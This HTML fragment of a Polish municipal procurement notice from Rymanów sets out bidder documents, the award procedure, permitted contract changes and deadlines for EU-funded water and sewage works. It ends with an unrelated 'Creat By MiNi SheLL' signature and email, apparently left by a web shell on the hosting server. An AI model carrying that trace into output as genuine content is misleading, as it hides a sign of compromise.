<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Wypełniony formularz ofertowy - Załącznik nr 1 do SIWZ
2) Dowód wniesienia wadium.
3) Wykonawca oferując produkty równoważne zobowiązany jest potwierdzić, że spełniają 
     stawiane im wymagania, poprzez dołączenie do oferty załącznika nr 13 do SIWZ (dotyczy 
     tylko i wyłącznie Wykonawców oferujących produkty równoważne).
4) Pełnomocnictwo (jeśli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany postanowień zawartej umowy możliwe będą do dokonania jedynie na podstawie postanowień zawartych w treści niniejszej umowy, za zgodą obu Stron w formie pisemnego aneksu do umowy, pod rygorem nieważności takiej zmiany.
2.	Nieważne z mocy ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych, są istotne zmiany w niniejszej umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem warunków wymienionych w treści niniejszej umowy.
3.	Zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, możliwe będą do dokonania na warunkach przewidzianych i określonych w specyfikacji istotnych warunków zamówienia i w treści niniejszej umowy, tj. w niżej wymienionych przypadkach:
1) 	Termin realizacji zamówienia może być zmieniony w przypadku, gdy opóźnienie w wykonaniu przedmiotu umowy spowodowane będzie okolicznością, która wystąpiła z przyczyn niezależnych od Wykonawcy po zawarciu umowy: 
a) gdy zajdzie konieczność wykonania robót dodatkowych lub zamiennych, które będą niezbędne do prawidłowego wykonania i zakończenia robót objętych umową podstawową, a ich wykonanie wraz z opracowaniem dokumentacji (jeżeli zajdzie taka konieczność) wymagać będzie więcej niż 4 tygodnie, 
b) wystąpienie warunków pogodowych mających wpływ na niemożność prowadzenia prac budowlanych jak: długotrwałe intensywne opady trwające powyżej 14 dni, powódź (czas niezbędny na ustąpienie wody z zalanego terenu i możliwość kontynuacji lub rozpoczęcia robót), wczesny okres zimowy, opady śniegu (poza miesiącami zimowymi), które uniemożliwiają prowadzenie robót, 
              c) Wystąpienie okoliczności powodujących konieczność opracowania oraz uzyskania 
              dodatkowych materiałów niezbędnych do prawidłowego zakończenia zadania (np. 
              decyzja pozwolenia na budowę/zgłoszenia w zakresie koniecznych zmian), dotyczy to 
              również opracowania dodatkowej lub zamiennej dokumentacji projektowej w przypadku  
              wystąpienia takiej konieczności z powodu wad lub braków dostarczonej przez  
              Zamawiającego dokumentacji,
d) Wstrzymania robót na okres dłuższy niż 2 tygodnie spowodowany wykryciem np. niewybuchów, niewypałów, wykopalisk archeologicznych, pozostałości budowli podziemnych, 
e) Wystąpienia niezgodności map geodezyjnych ze stanem faktycznym, które spowodują przerwę w pracach na okres dłuższy niż 3 tygodnie, 
f) Wstrzymania robót budowlanych przez organy administracji publicznej, 
g) zmiany zakresu rzeczowego zamówienia, gdy ze względów społecznych, gospodarczych w trakcie trwania realizacji inwestycji wystąpią okoliczności powodujące, że niecelowym jest wykonanie pełnego zakresu robót zgodnie z dokumentacją projektową. 
h) konieczności zmiany harmonogramu robót. 
i) przedłużeniem procedury udzielania zamówienia publicznego (np. odwołanie)
j) działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego
      2)    Zamawiający dopuszcza za zgodą Wykonawcy robót zmianę wartości i zakresu  
               wykonanych robót  w przypadku zwiększenia  lub zmniejszenia środków finansowych w 
                trakcie realizacji umowy. 
      3)     Zamawiający dopuszcza możliwość skrócenia terminów płatności faktur końcowych w 
               przypadku zmiany terminu wykonania przedmiotu umowy lub wystąpienia robót 
               dodatkowych lub uzupełniających warunkujących wykonanie umowy na zamówienie 
               podstawowe i w celu zapłacenia faktury w roku budżetowym, w którym umowa jest 
               realizowana. 
4)	Dopuszcza się za zgodą Projektanta zmianę sposobu wykonania poszczególnych robót 
         przy zachowaniu parametrów oraz możliwość zmiany kwoty wynagrodzenia w 
         przypadku zastosowania materiałów zamiennych, innych technologii lub rozwiązań, gdy  
         zmiana taka jest korzystna dla Zamawiającego, nie spowoduje wzrostu kosztów   
         inwestycji lub wpłynie na przyspieszenie terminu zakończenia robót budowlanych. 
5)     Jeżeli zaistnieje możliwość wykonania robót objętych niniejszą umową w terminach 
          krótszych niż wynikające z umowy oraz z harmonogramu prac, Zamawiający dopuszcza 
         zmianę harmonogramu prac w sposób przewidujący skrócenie całości robót lub 
         poszczególnych etapów robót, ale tylko po uprzedniej zgodzie na zabezpieczenie  
         środków finansowych w ramach roku budżetowego. 
      6)    Zamawiający dopuszcza możliwość zmiany osób Kierownika budowy i Kierowników 
              robót na wniosek Wykonawcy i tylko w sytuacji nieprzewidzianej (np. rozwiązanie 
              stosunku pracy) oraz zdarzenia losowego np. choroby, śmierci itp. Jeżeli zajdzie 
              konieczność wprowadzenia takiej zmiany Zamawiający żąda dokumentów kandydata na 
              stanowisko Kierownika budowy lub Kierownika robót, z których jednoznacznie musi  
              wynikać, że osoba ta spełnia warunki udziału jakie były określone dla tego postępowania 
              o udzielenie zamówienia publicznego. 
       7)   Poza przypadkami określonymi powyżej, istotne zmiany postanowień zawartej umowy 
              będą mogły nastąpić w razie zaistnienia, po zawarciu umowy: 
              a) przypadku siły wyższej, 
              b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na 
              realizację przedmiotu zamówienia, w tym również zmiany stawki podatku VAT. 
4.    Pozostałe zmiany. 
      1)   Zamawiający dopuszcza zastosowanie innych rozwiązań technicznych, technologicznych, 
             innych materiałów i urządzeń niż przewidziane w dokumentacji pod warunkiem, że: 
             a) Zamienne materiały i urządzenia będą miały lepsze parametry techniczne, bez 
             pogorszenia warunków eksploatacyjnych, 
             b) Zmiany te spowodują obniżenie kosztów na eksploatację i konserwację wykonanego 
             przedmiotu umowy bez pogorszenia parametrów technicznych materiałów i urządzeń, 
             c) Wynikać będą z konieczności usunięcia błędów w dokumentacji lub realizacji 
             przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych, technologicznych 
             lub materiałowych niż przewidziane w dokumentacji. Przyjęte w dokumentacji materiały 
            lub urządzenia są niedostępne na rynku, zostały wycofane z produkcji. 
      2)  Rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. Zamawiający 
             zastrzega sobie prawo do niezrealizowania pełnego zakresu robót, w sytuacji której nie 
             można było przewidzieć w chwili zawarcia umowy, a nie powstałej z winy  
             Zamawiającego ani Wykonawcy, maksymalnie do wysokości 20% wartości umowy bez  
             żadnych negatywnych skutków prawnych i finansowych. W takim przypadku 
             wynagrodzenie Wykonawcy zostanie pomniejszone i termin realizacji skrócony, przy 
             czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane 
             koszty, które Wykonawca poniósł w związku wynikającymi z umowy planowanymi 
             świadczeniami. 
6.     Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może 
         wyrazić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody. 
7.     Zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych nie stanowią: 
        1)  Zmiany danych związanych z obsługą organizacyjno-administracyjną np. zmiana kont 
         bankowych, procedur związanych z uregulowaniem płatności wobec Podwykonawców, 
         2) Zmiany osób wskazanych w umowie do kontaktów między Stronami, 
         3) Udzielenie zamówień dodatkowych określonych w przepisach Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rymanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Rymanowie, ul. Mitkowskiego 14a, 38-480 Rymanów - pok. nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2014 godzina 12:00, miejsce: Urząd Gminy w Rymanowie, ul. Mitkowskiego 14a, 38-480 Rymanów - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie współfinansowane ze środków Unii Europejskiej Program Operacyjny Infrastruktura i Środowisko 2007 - 2013 Priorytet: I oś Gospodarka wodno - ściekowa Działanie 1.1. Gospodarka wodno - ściekowa w aglomeracjach 
powyżej 15 tys. RLM.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com